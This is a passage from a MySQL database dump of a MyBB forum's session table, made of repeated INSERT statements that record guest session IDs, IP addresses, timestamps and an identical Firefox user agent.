`anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5393f284390356ea2825f7699a195b18', '0', '123.3.248.248', '1352772130', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b74005a1bd0eeef36f63a3d33cf1fe41', '0', '13.63.138.163', '1352772130', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a821e056a4f402ccd2b76d8171ab9edb', '0', '211.171.127.85', '1352772131', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6944bdb1be423e1f9cdb31812a9a9bb2', '0', '107.192.39.126', '1352772132', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e11a47f2d9c1ae49bfca4402d61559c', '0', '107.26.38.193', '1352772133', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1aad5a4a914846f8961cb113a3289054', '0', '173.90.124.132', '1352772133', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84cbd5166fcc7e74b24abc78e21f2779', '0', '38.27.92.249', '1352772134', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('202b264cb633a40668ee5bec37e800c1', '0', '89.139.221.33', '1352772137', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('35229013ec65cea440f864bd519ebd77', '0', '62.27.68.216', '1352772140', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d2df14c3a2c6ed4e711e3adda8222fc', '0', '94.181.113.187', '1352772141', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1783bc14e44470d2c7f19cdccb1c4bbb', '0', '179.61.14.166', '1352772141', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04a0211b7c70edfab9587faf34fe0fd9', '0', '111.245.153.204', '1352772142', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2df5e5c2be9b63c6744e93b88ecd8cd2', '0', '174.4.235.40', '1352772143', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('325674326fd26188997e0a9d3bede874', '0', '76.136.37.147', '1352772144', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d84e5acebf420d3159c4e81167424333', '0', '235.201.8.92', '1352772144', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e87dc0892d49ddfec2e75d21b08f3b9e', '0', '140.150.62.128', '1352772145', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d72355f0aa295cf516c63892d959db6', '0', '148.197.183.107', '1352772146', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2807fe045d96a29456a30405267bde13', '0', '143.120.2.64', '1352772148', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8494ac4abe56935a69cc45c7f2b99895', '0', '86.64.54.120', '1352772148', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4c305f6e4658c0c0dba04783eb4523e', '0', '6.231.219.83', '1352772149', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a2ca33cda3f5adff64520e89c0e0d252', '0', '134.90.7.168', '1352772150', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('937c85b9e84a00add09b14ffe4483437', '0', '183.105.43.206', '1352772150', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8bf420ef6216ca5f79f04f82c4f9e054', '0', '43.99.23.213', '1352772151', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('327186fb7282af37a761af1a871f51a0', '0', '194.97.203.234', '1352772152', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75717ff4ca0cd632d1f9250410d83aaf', '0', '32.225.123.208', '1352772153', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('219330d0a4c2bc531152318b88e145a6', '0', '111.194.157.161', '1352772159', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1cf65ec68d3866940a13f44ce67283b0', '0', '88.73.190.73', '1352772156', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5cc8e0717d3785eb6f3ba0c59e16ad89', '0', '243.68.132.155', '1352772160', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('17fddbedb18270c08adf8a3afe7db2e7', '0', '73.63.60.236', '1352772161', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1e0be4c19c27e227d0c022def03556cc', '0', '156.34.139.166', '1352772161', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c2e52146688ea619b050659e3c61265', '0', '76.225.125.177', '1352772162', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('377bae83fa9daa2494f9aa42540a6090', '0', '110.119.222.70', '1352772164', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('62433da97b4b4f7ebb2f71316245c6d1', '0', '62.24.98.166', '1352772165', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1162825c6554f4335c42515b8007d2d1', '0', '31.129.153.37', '1352772165', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4812d01f96e44c51dfa3917427fb816c', '0', '250.31.148.78', '1352772167', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce4432cbaf554919ffd80d70a379655e', '0', '38.134.81.242', '1352772168', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b147cf4b1b2271f88de1413331ad850b', '0', '119.220.24.242', '1352772168', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cfd6e7628197a6d73f62ae493e2382c5', '0', '253.214.208.237', '1352772169', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('519bdd46cb1a96d455d87ec2fed78da4', '0', '9.207.26.152', '1352772170', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba6c29174e7cc5e9d22a97ab4d3101cd', '0', '39.34.211.140', '1352772170', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d046a65694e6a5ba18c590482eeb7173', '0', '194.20.109.92', '1352772171', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b29209539b91c2792e4ae66e70627ec4', '0', '142.185.9.195', '1352772172', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3332bc94f410e5b86673ba0299b61951', '0', '85.155.20.19', '1352772173', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ae7e86f688f399957f3b0556a5761df', '0', '241.12.125.77', '1352772174', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff5ee18f0279fae458b29142b5ba2e30', '0', '178.48.184.50', '1352772638', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f25c02f0948429eadf78008b3a77d4f8', '0', '136.65.170.116', '1352772410', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0c5ec1ef788e536976842572baf15aa', '0', '68.245.51.85', '1352772174', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('face3199a40da0a36a0e832284130160', '0', '192.204.6.241', '1352772175', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5cfefd853305031aab3ead22be2006d3', '0', '86.136.195.145', '1352772176', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3c857f066fccded9d28d743c1513d554', '0', '81.188.48.160', '1352772176', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('23ccce09b7dc14ea6e1ad2fe9b166436', '0', '184.95.179.48', '1352772177', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f907a95fcfe2fc3293c0ec3c777515f7', '0', '129.119.164.25', '1352772178', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fce7b7d770699a8b6e8ee8d92ed98053', '0', '31.93.33.24', '1352772178', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0085652f19a96ed1dde25dd8a968ca02', '0', '54.224.40.99', '1352772179', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4187ed40f6d473b296cf213434e3156', '0', '207.144.234.226', '1352772179', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('723f51a6ac7ded37a6998bc29a2f8290', '0', '48.30.27.136', '1352772180', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b724ce9aea67c02152f3e49b2832187', '0', '78.156.104.115', '1352772181', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d223938c36e33276556d513e07cdfce9', '0', '147.40.4.71', '1352772181', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('222b4bf61e6b7e9c78f9a36efe49193a', '0', '100.1.165.139', '1352772182', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4648a48f323c290fe4a582b691677934', '0', '75.161.198.163', '1352772182', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f24628bcaf6ff6f359677da5264c9d6', '0', '181.84.71.62', '1352772183', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('383222be6033975b65ddf67ed4e988cc', '0', '24.50.75.237', '1352772184', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bd973976558bc9cbd1c63ba6c249e9f', '0', '130.19.180.38', '1352772184', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc42179116827c0f819528b0989433ae', '0', '196.1.235.193', '1352772185', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a0564d44eec5d65b835edc8fd5dd6a5', '0', '192.83.35.100', '1352772186', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('39044d83812b74fdaad4589fafd66fc4', '0', '56.52.145.133', '1352772187', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ac4bab4cbb51102c088535da07c6df5', '0', '187.105.239.121', '1352772187', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dbcd0cc01b99c7c7eaaa7387eecf0fd0', '0', '234.129.197.53', '1352772188', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('19b23d4e664de73d7a7baa164fb99510', '0', '235.89.151.46', '1352772188', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('277e1df7a869cb230b7faf27ceeb1750', '0', '125.59.114.65', '1352772189', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8322185393be4c3bceab4bdfd3983db', '0', '153.76.2.90', '1352772190', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c88fada90d66823057f9b4395ec5fe02', '0', '45.110.49.82', '1352772190', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('77645bcd8636c3bba1fa19ffce1c76f9', '0', '68.41.181.135', '1352772192', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d518590af3ba77c91577c957b18914c7', '0', '102.110.126.135', '1352772192', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da6b4edc6e590c2f3ed47d8f3f6b3f74', '0', '59.243.217.66', '1352772193', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('300ceeb9615d8484e1df1786ea53b144', '0', '19.158.248.50', '1352772193', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f2e7a35a67a62056764dd1c2bd55db9e', '0', '14.245.125.176', '1352772195', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('06b40848576a5726cfca8733a4d688ea', '0', '166.194.176.237', '1352772196', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f939de88e8e454d52ca4d7d92a36e89e', '0', '66.7.91.119', '1352772196', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4640e783539137ad407c508926c80bb', '0', '29.188.202.70', '1352772197', '/index.php?', 